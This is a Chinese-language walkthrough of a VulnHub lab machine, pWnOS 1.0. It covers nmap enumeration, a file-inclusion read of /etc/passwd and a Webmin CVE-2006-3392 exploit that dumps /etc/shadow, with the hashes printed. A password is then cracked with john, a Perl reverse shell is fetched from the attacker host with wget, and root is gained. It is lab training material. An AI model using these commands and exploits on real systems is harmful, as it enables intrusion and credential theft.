pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)

news2024/11/29 3:40:13

靶机介绍

来自 vulnhub

主机发现

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                              20:33:00 [0/3]
└─$ sudo nmap -sn 10.10.10.0/24                                 
[sudo] password for kali:                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:32 CST                                                                                            
Nmap scan report for localhost (10.10.10.1)                                    
Host is up (0.00056s latency).                                                                                                   
MAC Address: 00:50:56:C0:00:08 (VMware)                                        
Nmap scan report for bogon (10.10.10.2)                         
Host is up (0.00010s latency).                                                                                                   
MAC Address: 00:50:56:F3:32:0E (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.128)                                                                                        
Host is up (0.000096s latency).                                                                                                                               
MAC Address: 00:0C:29:83:4F:85 (VMware)                                        
Nmap scan report for bogon (10.10.10.131)                       
Host is up (0.00011s latency).                                                                                                   
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.254)                                                                                        
Host is up (0.00011s latency).                                  
MAC Address: 00:50:56:EB:94:F3 (VMware)                         
Nmap scan report for bogon (10.10.10.129)                                                                                        
Host is up.                                                                                                                                                   
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.93 seconds                                                                                              
                                                                                                                                                              
┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ sudo nmap --min-rate 1000 -p- 10.10.10.131                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:35 CST                                                               
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.0013s latency).                                   
Not shown: 65530 closed tcp ports (reset)                       
PORT      STATE SERVICE                                                        
22/tcp    open  ssh                                                            
80/tcp    open  http                                                                                                                                          
139/tcp   open  netbios-ssn                                                    
445/tcp   open  microsoft-ds                                                   
10000/tcp open  snet-sensor-mgmt                                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        

Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds                                                                                                                                                                              


┌──(kali㉿kali)-[~/testPwnos1.0]                                               
└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.10.131                                                                                                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:43 CST                                                                                            
Warning: 10.10.10.131 giving up on port because retransmission cap hit (10).                                                                                  
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.00050s latency).                                                 
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)                                                                    
PORT      STATE SERVICE                                                        
137/udp   open  netbios-ns                                                     
10000/udp open  ndmp                                                           
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        

Nmap done: 1 IP address (1 host up) scanned in 72.84 seconds 

tcp 扫描,扫描服务版本,扫描操作系统

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo nmap -sT -sV -O -p22,80,139,445,10000 10.10.10.131                    
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:39 CST
Nmap scan report for localhost (10.10.10.131)
Host is up (0.00014s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|broadband router|remote management|media device|VoIP phone
Running (JUST GUESSING): Linux 2.6.X|2.4.X (98%), Linksys embedded (95%), Arris embedded (94%), Dell embedded (93%), LifeSize embedded (93%), ShoreTel embedded (93%), Netgear embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:linksys:wrv54g cpe:/h:dell:remote_access_card:7 cpe:/o:linux:linux_kernel:2.4 cpe:/h:shoretel:8800 cpe:/h:netgear:neotv550
Aggressive OS guesses: Linux 2.6.22 (embedded, ARM) (98%), Linux 2.6.22 - 2.6.23 (98%), Linux 2.6.9 - 2.6.33 (97%), Linksys WRV54G WAP (95%), Linksys WRT610Nv3 WAP (95%), Linux 2.6.18 - 2.6.32 (94%), Arr
is TG862G/CT cable modem (94%), Linux 2.6.24 (94%), Linux 2.6.19 - 2.6.36 (93%), Linux 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop                           
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.76 seconds


漏洞脚本扫描。80 端口的 /icons/,/index/,/php/ 是enum ,似乎有点价值

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                                            
└─$ sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.131                                                                                                                                                                                                                                                              
[sudo] password for kali:                                                                                                                                                                                                                                                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:40 CST                                                                                                                                                                                                                                                          
Nmap scan report for localhost (10.10.10.131)                                                                                                                                                                                                                                                                               
Host is up (0.00027s latency).                                                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                                                                                            
PORT      STATE SERVICE                                                                                                                                                                                                                                                                                                     
22/tcp    open  ssh                                                                                                                                                                                                                                                                                                         
80/tcp    open  http                                                                                                                                                                                                                                                                                                        
|_http-trace: TRACE is enabled                                                                                                                                
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                           
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                                                   
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                          
| http-slowloris-check:                                                                 
|   VULNERABLE:                                                                                                                                                                   
|   Slowloris DOS attack                                                                                                                                                        
|     State: LIKELY VULNERABLE                                                                                                                                                    
|     IDs:  CVE:CVE-2007-6750                                                            
|       Slowloris tries to keep many connections to the target web server open and hold                                                                       
|       them open as long as possible.  It accomplishes this by opening connections to                                                                      
|       the target web server and sending a partial request. By doing so, it starves                                                                          
|       the http server's resources causing Denial Of Service.                                                                                                
|                                                                                                                                                                               
|     Disclosure date: 2009-09-17                                                        
|     References:                                                                        
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                                              
|_      http://ha.ckers.org/slowloris/                                                                                                                                            
| http-enum:                                                                                                                                                                      
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                       
|   /index/: Potentially interesting folder                                              
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                         
139/tcp   open  netbios-ssn                                                                                                                                                       
445/tcp   open  microsoft-ds                                                                                                                                                      
10000/tcp open  snet-sensor-mgmt                                                         
| http-vuln-cve2006-3392:                                                                
|   VULNERABLE:                                                                
|   Webmin File Disclosure                                                               
|     State: VULNERABLE (Exploitable)                                                    
|     IDs:  CVE:CVE-2006-3392                                                                                                                                                     
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.                                                   
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences                                                     
|       to bypass the removal of "../" directory traversal sequences.                                                                                         
|                                                                              
|     Disclosure date: 2006-06-29                                              
|     References:                                                              
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392                                                                                          
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure                                                                               
|_      http://www.exploit-db.com/exploits/1997/                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        

Host script results:                                                           
|_smb-vuln-ms10-054: false                                                     
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)                                                                                       
|_smb-vuln-ms10-061: false                                                     

Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds    

web渗透

访问 80 端口
在这里插入图片描述观察 10000 端口跑 http 服务,尝试访问
在这里插入图片描述
(你这网站不保熟啊)
在这里插入图片描述
加个单引号,有报错回显,当前页似乎在包含一个文件显示,尝试利用文件包含
(这个参数是否可以通过模糊测试 fuzz 来找到呢?)
在这里插入图片描述果然存在文件包含
在这里插入图片描述
用curl 请求,看得清楚一些。curl 请求应当加引号,防止转义符转义
发现这几个用户有意思

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash     
┌──(kali㉿kali)-[~/testPwnos1.0]                                                         
└─$ curl 'http://10.10.10.131/index1.php?help=true&connect=/etc/passwd'                                                                                                           
<HTML>                                                                                   
<body>                                                                                   
<center><h1>Welcome to the pWnOS homepage!                                               
</h1></center>                                                                           

<p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>                                                                                                                                                                                                                            

<form name="form" method="GET" action="index2.php">                                      
<table border=1>                                                                         
<tr><td width=175>                                                                       
Name:                                                                                    
</td>                                                                                    
<td width=175>                                                                           
<input type = "text" name="name" size=25>                                                
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    
<tr>                                                                                     
<td>                                                                                     
Skillz:                                                                                  
</td>                                                                                    
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>                                                                                                         
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>                                                                                         
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>                                                                                           
</tr>                                                                                    
<tr><td width=175>                                                                       
<input type = "submit" name = "submit" value = "Please Help!">                           
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    

</table>                                                                                 
</form>                                                                                  


root:x:0:0:root:/root:/bin/bash                                                          
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                                                    
bin:x:2:2:bin:/bin:/bin/sh                                                               
sys:x:3:3:sys:/dev:/bin/sh                                                               
sync:x:4:65534:sync:/bin:/bin/sync                                                       
games:x:5:60:games:/usr/games:/bin/sh                                                    
man:x:6:12:man:/var/cache/man:/bin/sh                                                    
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                                                       
mail:x:8:8:mail:/var/mail:/bin/sh                                                        
news:x:9:9:news:/var/spool/news:/bin/sh                                                  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                                                
proxy:x:13:13:proxy:/bin:/bin/sh                                                         
www-data:x:33:33:www-data:/var/www:/bin/sh                                               
backup:x:34:34:backup:/var/backups:/bin/sh                                               
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                      
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                                                   
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                                                                           
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                                         
dhcp:x:100:101::/nonexistent:/bin/false                                                  
syslog:x:101:102::/home/syslog:/bin/false                                                
klog:x:102:103::/home/klog:/bin/false                                                    
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin                                        
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash                                               

</body>                                                                                  
</HTML>          

看一看 80 端口 /php/ 的内容
在这里插入图片描述点击进入,不过没有密码。发现系统名称和版本暴露,下一步尝试 searchsploit

Welcome to phpMyAdmin 2.6.3-pl1

在这里插入图片描述不过跨站脚本没啥用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit phpmyadmin 2.6.3                   
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path                                                                                                                  | php/webapps/12642.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

漏洞脚本利用

根据漏洞脚本扫描的结果,发现 10000 端口跑的是 webmin ,根据经验推测其可被利用
searchsploit 找一找

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin          
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal                                                                                                          | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                                                                                                                         | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                                                                                                                     | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                                                                                                                                 | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                                                                                                                        | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing                                                                                                              | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                                                                                                                  | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                                                                                                                       | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                                                                                                                             | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                                                                                                                       | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)                                                                                                    | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                                                                                                                  | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                                                                                                                     | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                                                   | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                                                                                                                     | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)                                                                                                        | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)                                                                                                          | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)                                                                                                               | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)                                                                                                         | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)                                                                                                                     | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)                                                                                                               | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution                                                                                                                                | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                                                                                                            | linux/webapps/47330.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


排除 metasploit 和 csrf 和 内核提权,发现 2017.pl 似乎可以使用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin -m 2017.pl
[!] Could not find EDB-ID #


  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/2017
     Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
    Codes: CVE-2006-3392
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos1.0/2017.pl

摸索一下这个脚本怎么用,成功运行后拿到 passwd 的内容,不过和之前 80 端口文件包含拿到的内容相同。

┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd                    
Usage: ./2017.pl <url> <port> <filename> <target>                                                                                
TARGETS are                                                     
 0  - > HTTP                                                    
 1  - > HTTPS                                                   
Define full path with file name                                 
Example: ./webmin.pl blah.com 10000 /etc/passwd                 

┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd 0                  
WEBMIN EXPLOIT !!!!! coded by UmZ!                              
Comments and Suggestions are welcome at umz32.dll [at] gmail.com                                                                 
Vulnerability disclose at securitydot.net                       
I am just coding it in perl 'cuz I hate PHP!                    
Attacking 10.10.10.131 on port 10000!                           
FILENAME:  /etc/passwd                                          

 FILE CONTENT STARTED                                           
 -----------------------------------                            
root:x:0:0:root:/root:/bin/bash                                 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                           
bin:x:2:2:bin:/bin:/bin/sh                                      
sys:x:3:3:sys:/dev:/bin/sh                                      
sync:x:4:65534:sync:/bin:/bin/sync                              
games:x:5:60:games:/usr/games:/bin/sh                           
man:x:6:12:man:/var/cache/man:/bin/sh                           
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                              
mail:x:8:8:mail:/var/mail:/bin/sh                               
news:x:9:9:news:/var/spool/news:/bin/sh                         
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                       
proxy:x:13:13:proxy:/bin:/bin/sh                                
www-data:x:33:33:www-data:/var/www:/bin/sh                      
backup:x:34:34:backup:/var/backups:/bin/sh                      
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                                                              
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                          
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                          
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                
dhcp:x:100:101::/nonexistent:/bin/false                         
syslog:x:101:102::/home/syslog:/bin/false                       
klog:x:102:103::/home/klog:/bin/false                           
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                                                        
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin               
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                                                              
obama:x:1001:1001::/home/obama:/bin/bash                        
osama:x:1002:1002::/home/osama:/bin/bash                        
yomama:x:1003:1003::/home/yomama:/bin/bash                      

 -------------------------------------  

之前 80 端口的网页文件包含没法读 shadow,于是尝试用利用脚本读 shadow。
居然可以读到 shadow

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ./2017.pl 10.10.10.131 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /etc/shadow

 FILE CONTENT STARTED
 -----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

 -------------------------------------

恰好拿到我们关心用户的密码的哈希 (居然也拿到了 root 的密码哈希)

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

密码破解

尝试破解。 shadow 内容的 md5 可用 john 破解,其余 md5 或 sha-1 可用 hashcat 破解。
拿到一个密码,vmware 的 密码是 h4ckm3 (味道很冲的密码)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware)     
1g 0:00:03:18 DONE (2024-10-05 22:20) 0.005031g/s 70943p/s 322002c/s 322002C/s  ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

补充额外知识点:
如果拿到 passwd 和 shadow ,可以尝试使用 unshadow 把二者合起来,如下
unshadow passwd shadows > unshadow.txt

连 ssh ,这里涉及 ssh 参数调整 -oHostKeyAlgorithms= 指定加密算法

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh vmware@10.10.10.131                   
[sudo] password for kali: 
Unable to negotiate with 10.10.10.131 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (RSA) to the list of known hosts.
vmware@10.10.10.131's password: 
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ 


拿到初级 shell 后

做一个基础的信息收集
当前账号没有 sudo 权限,考虑提权

vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$ ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.131/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe5e:18c9/64 scope link 
       valid_lft forever preferred_lft forever
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
vmware@ubuntuvm:~$ python --version
Python 2.5.1
vmware@ubuntuvm:~$ python -c "import pty;pty.spawn('/bin/bash')"

看一下计划任务,似乎没有

vmware@ubuntuvm:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看一下网站目录。webmin 和 www 由 root 用户创建,权限比较高。结合 webmin 能读 shadow 文件,推测这两个目录权限较高,可作为突破口

vmware@ubuntuvm:~$ cd /var
vmware@ubuntuvm:/var$ ls -liah
total 52K
244801 drwxr-xr-x 15 root root  4.0K 2008-06-10 13:28 .
     2 drwxr-xr-x 21 root root  4.0K 2008-06-10 06:37 ..
261122 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:28 backups
244808 drwxr-xr-x  9 root root  4.0K 2008-06-10 07:07 cache
244804 drwxr-xr-x 23 root root  4.0K 2008-06-10 07:08 lib
261125 drwxrwsr-x  2 root staff 4.0K 2007-10-08 05:47 local
  7612 drwxrwxrwt  3 root root    60 2024-10-05 07:27 lock
261126 drwxr-xr-x 11 root root  4.0K 2024-10-05 07:27 log
262195 drwxrwsr-x  2 root mail  4.0K 2008-06-10 06:24 mail
262194 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:24 opt
  7608 drwxr-xr-x 11 root root   400 2024-10-05 09:48 run
261127 drwxr-xr-x  5 root root  4.0K 2008-06-10 07:07 spool
261128 drwxrwxrwt  2 root root  4.0K 2007-10-08 05:47 tmp
344741 drwx------  2 root bin   4.0K 2008-06-10 13:31 webmin
295040 drwxr-xr-x  3 root root  4.0K 2008-06-12 09:55 www
vmware@ubuntuvm:/var$ 

构造 perl 的 cgi 反弹 shell
vim 修改 反弹 ip 的地址为 kali
开 php 服务器,准备让靶机下载文件

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ls
2017.pl  hash  passwd  shadow  shell.cgi  unshadow.txt
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ vim shell.cgi 


┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo php -S 0:80                                                      
[sudo] password for kali: 
[Sat Oct  5 23:04:23 2024] PHP 8.2.21 Development Server (http://0:80) started

使用靶机下载 .cgi 并给执行权限

vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ wget http://10.10.10.129/shell.cgi
--10:06:15--  http://10.10.10.129/shell.cgi
           => `shell.cgi'
Connecting to 10.10.10.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,715 (3.6K)

100%[====================================>] 3,715         --.--K/s             

10:06:15 (505.77 MB/s) - `shell.cgi' saved [3715/3715]

vmware@ubuntuvm:~$ ls
shell.cgi
vmware@ubuntuvm:~$ chmod +x shell.cgi 

监听,尝试收反弹 shell

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234

之前的 perl 脚本可以请求指定位置文件,结合 perl 的 CGI 脚本执行需要网络请求的特性,使用脚本请求在 kali 构造好的反弹 shell。
(似乎也可尝试 本地执行)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ./2017.pl 10.10.10.131 10000 /home/vmware/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /home/vmware/shell.cgi

 FILE CONTENT STARTED
 -----------------------------------
Browser IP address appears to be: 10.10.10.129<p>

 -------------------------------------

从监听收到反弹 shell,拿下 root

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.131:44869.
 10:13:26 up  2:45,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.129     09:25    6:41m  0.07s  0.01s python -c impor
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# 
# whoami
root
# ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
